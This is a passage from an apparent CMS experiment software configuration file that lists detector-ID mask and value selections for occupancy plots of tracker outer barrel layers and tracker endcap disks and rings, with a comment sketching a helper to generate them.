cms.PSet(detSelection=cms.uint32(3304),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e00c")), # TOB+ L3 m3
cms.PSet(detSelection=cms.uint32(3305),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e008")), # TOB+ L3 m2
cms.PSet(detSelection=cms.uint32(3306),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e004")), # TOB+ L3 m1
cms.PSet(detSelection=cms.uint32(3307),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d004")), # TOB- L3 m1
cms.PSet(detSelection=cms.uint32(3308),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d008")), # TOB- L3 m2
cms.PSet(detSelection=cms.uint32(3309),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d00c")), # TOB- L3 m3
cms.PSet(detSelection=cms.uint32(3310),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d010")), # TOB- L3 m4
cms.PSet(detSelection=cms.uint32(3311),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d014")), # TOB- L3 m5
cms.PSet(detSelection=cms.uint32(3312),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d018")), # TOB- L3 m6
cms.PSet(detSelection=cms.uint32(3401),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a012018")), # TOB+ L4 m6
cms.PSet(detSelection=cms.uint32(3402),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a012014")), # TOB+ L4 m5
cms.PSet(detSelection=cms.uint32(3403),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a012010")), # TOB+ L4 m4
cms.PSet(detSelection=cms.uint32(3404),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01200c")), # TOB+ L4 m3
cms.PSet(detSelection=cms.uint32(3405),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a012008")), # TOB+ L4 m2
cms.PSet(detSelection=cms.uint32(3406),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a012004")), # TOB+ L4 m1
cms.PSet(detSelection=cms.uint32(3407),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a011004")), # TOB- L4 m1
cms.PSet(detSelection=cms.uint32(3408),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a011008")), # TOB- L4 m2
cms.PSet(detSelection=cms.uint32(3409),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01100c")), # TOB- L4 m3
cms.PSet(detSelection=cms.uint32(3410),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a011010")), # TOB- L4 m4
cms.PSet(detSelection=cms.uint32(3411),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a011014")), # TOB- L4 m5
cms.PSet(detSelection=cms.uint32(3412),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a011018")), # TOB- L4 m6
cms.PSet(detSelection=cms.uint32(3501),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a016018")), # TOB+ L5 m6
cms.PSet(detSelection=cms.uint32(3502),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a016014")), # TOB+ L5 m5
cms.PSet(detSelection=cms.uint32(3503),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a016010")), # TOB+ L5 m4
cms.PSet(detSelection=cms.uint32(3504),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01600c")), # TOB+ L5 m3
cms.PSet(detSelection=cms.uint32(3505),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a016008")), # TOB+ L5 m2
cms.PSet(detSelection=cms.uint32(3506),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a016004")), # TOB+ L5 m1
cms.PSet(detSelection=cms.uint32(3507),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a015004")), # TOB- L5 m1
cms.PSet(detSelection=cms.uint32(3508),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a015008")), # TOB- L5 m2
cms.PSet(detSelection=cms.uint32(3509),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01500c")), # TOB- L5 m3
cms.PSet(detSelection=cms.uint32(3510),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a015010")), # TOB- L5 m4
cms.PSet(detSelection=cms.uint32(3511),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a015014")), # TOB- L5 m5
cms.PSet(detSelection=cms.uint32(3512),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a015018")), # TOB- L5 m6
cms.PSet(detSelection=cms.uint32(3601),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a018")), # TOB+ L6 m6
cms.PSet(detSelection=cms.uint32(3602),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a014")), # TOB+ L6 m5
cms.PSet(detSelection=cms.uint32(3603),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a010")), # TOB+ L6 m4
cms.PSet(detSelection=cms.uint32(3604),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a00c")), # TOB+ L6 m3
cms.PSet(detSelection=cms.uint32(3605),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a008")), # TOB+ L6 m2
cms.PSet(detSelection=cms.uint32(3606),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a004")), # TOB+ L6 m1
cms.PSet(detSelection=cms.uint32(3607),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a019004")), # TOB- L6 m1
cms.PSet(detSelection=cms.uint32(3608),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a019008")), # TOB- L6 m2
cms.PSet(detSelection=cms.uint32(3609),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01900c")), # TOB- L6 m3
cms.PSet(detSelection=cms.uint32(3610),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a019010")), # TOB- L6 m4
cms.PSet(detSelection=cms.uint32(3611),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a019014")), # TOB- L6 m5
cms.PSet(detSelection=cms.uint32(3612),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a019018")) # TOB- L6 m6
)
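# The PSets above differ only in their numeric tag and in the value half of the
# "mask-value" string, so an equivalent list could be generated programmatically.
# A hypothetical helper (not in the original file), shown commented out for
# illustration:
#
# def _maskValuePSet(tag, mask, value, label="Dummy"):
#     return cms.PSet(detSelection=cms.uint32(tag),
#                     detLabel=cms.string(label),
#                     selection=cms.untracked.vstring("0x%08x-0x%08x" % (mask, value)))
#
# e.g. _maskValuePSet(3612, 0x1e01f01c, 0x1a019018) would reproduce the last
# TOB entry above.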
OccupancyPlotsStripWantedSubDets.extend(
cms.VPSet(
cms.PSet(detSelection=cms.uint32(4111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c045020")), # TEC- D1 R1 back
cms.PSet(detSelection=cms.uint32(4112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c046020")), # TEC- D1 R1 front
cms.PSet(detSelection=cms.uint32(4121),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c049020")), # TEC- D2 R1 back
cms.PSet(detSelection=cms.uint32(4122),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a020")), # TEC- D2 R1 front
cms.PSet(detSelection=cms.uint32(4131),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d020")), # TEC- D3 R1 back
cms.PSet(detSelection=cms.uint32(4132),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e020")), # TEC- D3 R1 front
# cms.PSet(detSelection=cms.uint32(4141),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c051020")), # TEC- D4 R1 back
# cms.PSet(detSelection=cms.uint32(4142),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c052020")), # TEC- D4 R1 front
# cms.PSet(detSelection=cms.uint32(4151),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c055020")), # TEC- D5 R1 back
# cms.PSet(detSelection=cms.uint32(4152),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c056020")), # TEC- D5 R1 front
# cms.PSet(detSelection=cms.uint32(4161),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c059020")), # TEC- D6 R1 back
# cms.PSet(detSelection=cms.uint32(4162),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a020")), # TEC- D6 R1 front
# cms.PSet(detSelection=cms.uint32(4171),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d020")), # TEC- D7 R1 back
# cms.PSet(detSelection=cms.uint32(4172),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e020")), # TEC- D7 R1 front
# cms.PSet(detSelection=cms.uint32(4181),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c061020")), # TEC- D8 R1 back
# cms.PSet(detSelection=cms.uint32(4182),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c062020")), # TEC- D8 R1 front
# cms.PSet(detSelection=cms.uint32(4191),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c065020")), # TEC- D9 R1 back
# cms.PSet(detSelection=cms.uint32(4192),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c066020")), # TEC- D9 R1 front
cms.PSet(detSelection=cms.uint32(4211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c045040")), # TEC- D1 R2 back
cms.PSet(detSelection=cms.uint32(4212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c046040")), # TEC- D1 R2 front
cms.PSet(detSelection=cms.uint32(4221),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c049040")), # TEC- D2 R2 back
cms.PSet(detSelection=cms.uint32(4222),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a040")), # TEC- D2 R2 front
cms.PSet(detSelection=cms.uint32(4231),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d040")), # TEC- D3 R2 back
cms.PSet(detSelection=cms.uint32(4232),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e040")), # TEC- D3 R2 front
cms.PSet(detSelection=cms.uint32(4241),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c051040")), # TEC- D4 R2 back
cms.PSet(detSelection=cms.uint32(4242),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c052040")), # TEC- D4 R2 front
cms.PSet(detSelection=cms.uint32(4251),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c055040")), # TEC- D5 R2 back
cms.PSet(detSelection=cms.uint32(4252),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c056040")), # TEC- D5 R2 front
cms.PSet(detSelection=cms.uint32(4261),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c059040")), # TEC- D6 R2 back
cms.PSet(detSelection=cms.uint32(4262),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a040")), # TEC- D6 R2 front
# cms.PSet(detSelection=cms.uint32(4271),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d040")), # TEC- D7 R2 back
# cms.PSet(detSelection=cms.uint32(4272),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e040")), # TEC- D7 R2 front
# cms.PSet(detSelection=cms.uint32(4281),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c061040")), # TEC- D8 R2 back
# cms.PSet(detSelection=cms.uint32(4282),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c062040")), # TEC- D8 R2 front
# cms.PSet(detSelection=cms.uint32(4291),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c065040")), # TEC- D9 R2 back
# cms.PSet(detSelection=cms.uint32(4292),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c066040")), # TEC- D9 R2 front
cms.PSet(detSelection=cms.uint32(4311),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c045060")), # TEC- D1 R3 back
cms.PSet(detSelection=cms.uint32(4312),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c046060")), # TEC- D1 R3 front
cms.PSet(detSelection=cms.uint32(4321),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c049060")), # TEC- D2 R3 back
cms.PSet(detSelection=cms.uint32(4322),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a060")), # TEC- D2 R3 front
cms.PSet(detSelection=cms.uint32(4331),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d060")), # TEC- D3 R3 back
cms.PSet(detSelection=cms.uint32(4332),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e060")), # TEC- D3 R3 front
cms.PSet(detSelection=cms.uint32(4341),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c051060")), # TEC- D4 R3 back
cms.PSet(detSelection=cms.uint32(4342),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c052060")), # TEC- D4 R3 front
cms.PSet(detSelection=cms.uint32(4351),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c055060")), # TEC- D5 R3 back
cms.PSet(detSelection=cms.uint32(4352),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c056060")), # TEC- D5 R3 front
cms.PSet(detSelection=cms.uint32(4361),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c059060")), # TEC- D6 R3 back
cms.PSet(detSelection=cms.uint32(4362),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a060")), # TEC- D6 R3 front
cms.PSet(detSelection=cms.uint32(4371),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d060")), # TEC- D7 R3 back
cms.PSet(detSelection=cms.uint32(4372),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e060")), # TEC- D7 R3 front
cms.PSet(detSelection=cms.uint32(4381),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c061060")), # TEC- D8 R3 back
cms.PSet(detSelection=cms.uint32(4382),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c062060")), # TEC- D8 R3 front
# cms.PSet(detSelection=cms.uint32(4391),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c065060")), # TEC- D9 R3 back
# cms.PSet(detSelection=cms.uint32(4392),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c066060")), # TEC- D9 R3 front
cms.PSet(detSelection=cms.uint32(4411),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c045080")), # TEC- D1 R4 back
cms.PSet(detSelection=cms.uint32(4412),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c046080")), # TEC- D1 R4 front
cms.PSet(detSelection=cms.uint32(4421),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c049080")), # TEC- D2 R4 back
cms.PSet(detSelection=cms.uint32(4422),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a080")), # TEC- D2 R4 front
cms.PSet(detSelection=cms.uint32(4431),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d080")), # TEC- D3 R4 back
cms.PSet(detSelection=cms.uint32(4432),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e080")), # TEC- D3 R4 front
cms.PSet(detSelection=cms.uint32(4441),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c051080")), # TEC- D4 R4 back
cms.PSet(detSelection=cms.uint32(4442),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c052080")), # TEC- D4 R4 front
cms.PSet(detSelection=cms.uint32(4451),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c055080")), # TEC- D5 R4 back
cms.PSet(detSelection=cms.uint32(4452),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c056080")), # TEC- D5 R4 front
cms.PSet(detSelection=cms.uint32(4461),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c059080")), # TEC- D6 R4 back
cms.PSet(detSelection=cms.uint32(4462),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a080")), # TEC- D6 R4 front
cms.PSet(detSelection=cms.uint32(4471),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d080")), # TEC- D7 R4 back
cms.PSet(detSelection=cms.uint32(4472),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e080")), # TEC- D7 R4 front
cms.PSet(detSelection=cms.uint32(4481),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c061080")), # TEC- D8 R4 back
cms.PSet(detSelection=cms.uint32(4482),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c062080")), # TEC- D8 R4 front
cms.PSet(detSelection=cms.uint32(4491),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c065080")), # TEC- D9 R4 back
cms.PSet(detSelection=cms.uint32(4492),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c066080")), # TEC- D9 R4 front
cms.PSet(detSelection=cms.uint32(4511),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0450a0")), # TEC- D1 R5 back
cms.PSet(detSelection=cms.uint32(4512),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0460a0")), # TEC- D1 R5 front
cms.PSet(detSelection=cms.uint32(4521),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0490a0")), # TEC- D2 R5 back
cms.PSet(detSelection=cms.uint32(4522),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a0a0")), # TEC- D2 R5 front
cms.PSet(detSelection=cms.uint32(4531),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d0a0")), # TEC- D3 R5 back
cms.PSet(detSelection=cms.uint32(4532),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e0a0")), # TEC- D3 R5 front
cms.PSet(detSelection=cms.uint32(4541),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0510a0")), # TEC- D4 R5 back
cms.PSet(detSelection=cms.uint32(4542),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0520a0")), # TEC- D4 R5 front
cms.PSet(detSelection=cms.uint32(4551),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0550a0")), # TEC- D5 R5 back
cms.PSet(detSelection=cms.uint32(4552),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0560a0")), # TEC- D5 R5 front
cms.PSet(detSelection=cms.uint32(4561),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0590a0")), # TEC- D6 R5 back
cms.PSet(detSelection=cms.uint32(4562),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a0a0")), # TEC- D6 R5 front
cms.PSet(detSelection=cms.uint32(4571),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d0a0")), # TEC- D7 R5 back
cms.PSet(detSelection=cms.uint32(4572),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e0a0")), # TEC- D7 R5 front
cms.PSet(detSelection=cms.uint32(4581),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0610a0")), # TEC- D8 R5 back
cms.PSet(detSelection=cms.uint32(4582),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0620a0")), # TEC- D8 R5 front
cms.PSet(detSelection=cms.uint32(4591),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0650a0")), # TEC- D9 R5 back
cms.PSet(detSelection=cms.uint32(4592),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0660a0")), # TEC- D9 R5 front
cms.PSet(detSelection=cms.uint32(4611),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0450c0")), # TEC- D1 R6 back
cms.PSet(detSelection=cms.uint32(4612),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0460c0")), # TEC- D1 R6 front
cms.PSet(detSelection=cms.uint32(4621),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0490c0")), # TEC- D2 R6 back
cms.PSet(detSelection=cms.uint32(4622),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a0c0")), # TEC- D2 R6 front
cms.PSet(detSelection=cms.uint32(4631),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d0c0")), # TEC- D3 R6 back
cms.PSet(detSelection=cms.uint32(4632),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e0c0")), # TEC- D3 R6 front
cms.PSet(detSelection=cms.uint32(4641),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0510c0")), # TEC- D4 R6 back
cms.PSet(detSelection=cms.uint32(4642),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0520c0")), # TEC- D4 R6 front
cms.PSet(detSelection=cms.uint32(4651),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0550c0")), # TEC- D5 R6 back
cms.PSet(detSelection=cms.uint32(4652),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0560c0")), # TEC- D5 R6 front
cms.PSet(detSelection=cms.uint32(4661),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0590c0")), # TEC- D6 R6 back
cms.PSet(detSelection=cms.uint32(4662),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a0c0")), # TEC- D6 R6 front
cms.PSet(detSelection=cms.uint32(4671),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d0c0")), # TEC- D7 R6 back
cms.PSet(detSelection=cms.uint32(4672),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e0c0")), # TEC- D7 R6 front
cms.PSet(detSelection=cms.uint32(4681),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0610c0")), # TEC- D8 R6 back
cms.PSet(detSelection=cms.uint32(4682),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0620c0")), # TEC- D8 R6 front
cms.PSet(detSelection=cms.uint32(4691),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0650c0")), # TEC- D9 R6 back
cms.PSet(detSelection=cms.uint32(4692),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0660c0")), # TEC- D9 R6 front
cms.PSet(detSelection=cms.uint32(4711),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0450e0")), # TEC- D1 R7 back
cms.PSet(detSelection=cms.uint32(4712),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0460e0")), # TEC- D1 R7 front
cms.PSet(detSelection=cms.uint32(4721),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0490e0")), # TEC- D2 R7 back
cms.PSet(detSelection=cms.uint32(4722),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a0e0")), # TEC- D2 R7 front
cms.PSet(detSelection=cms.uint32(4731),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d0e0")), # TEC- D3 R7 back
cms.PSet(detSelection=cms.uint32(4732),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e0e0")), # TEC- D3 R7 front
cms.PSet(detSelection=cms.uint32(4741),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0510e0")), # TEC- D4 R7 back
cms.PSet(detSelection=cms.uint32(4742),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0520e0")), # TEC- D4 R7 front
cms.PSet(detSelection=cms.uint32(4751),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0550e0")), # TEC- D5 R7 back
cms.PSet(detSelection=cms.uint32(4752),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0560e0")), # TEC- D5 R7 front
cms.PSet(detSelection=cms.uint32(4761),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0590e0")), # TEC- D6 R7 back
cms.PSet(detSelection=cms.uint32(4762),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a0e0")), # TEC- D6 R7 front
cms.PSet(detSelection=cms.uint32(4771),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d0e0")), # TEC- D7 R7 back
cms.PSet(detSelection=cms.uint32(4772),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e0e0")), # TEC- D7 R7 front
cms.PSet(detSelection=cms.uint32(4781),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0610e0")), # TEC- D8 R7 back
cms.PSet(detSelection=cms.uint32(4782),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0620e0")), # TEC- D8 R7 front
cms.PSet(detSelection=cms.uint32(4791),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0650e0")), # TEC- D9 R7 back
cms.PSet(detSelection=cms.uint32(4792),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0660e0")), # TEC- D9 R7 front
cms.PSet(detSelection=cms.uint32(5111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c085020")), # TEC+ D1 R1 back
cms.PSet(detSelection=cms.uint32(5112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c086020")), # TEC+ D1 R1 front
cms.PSet(detSelection=cms.uint32(5121),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c089020")), # TEC+ D2 R1 back
